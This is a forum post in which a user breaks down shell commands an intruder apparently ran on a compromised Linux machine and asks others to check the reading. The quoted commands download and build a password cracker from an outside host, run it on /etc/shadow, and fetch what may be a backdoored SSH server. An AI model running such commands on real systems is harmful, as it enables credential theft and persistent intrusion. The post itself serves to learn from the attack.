My knowledge in linux is slowly coming back, but is this interpretation correct?

w
Does a who command to see who is all on the system.

wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow

These commands are broken into parts shown by a seperator(the semicolon). First wget command grabs what I am guessing is john the ripper or another password cracker. Second command is to basically unzip the file in windows terms. Then he removes the original zipped up archive. Changes the directory and makes the exe. Next command changes directory to the executable file. Then the ./ runs the program on /etc/shadow. This would make me assume that he already had root from the exploit, but probably would rather have a valid account for later use.

wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh

Gets a file which I am guessing is a SSH server either whole because the target server didn't have the files installed or a hacked up version for his use.

The rest of it is pretty much setting up the backdoor and cleaning up a little.

That is just my interpretation of it broken down into tiny bits. Please point out any faulty points in my logic though cause I really need to get my linux skills back.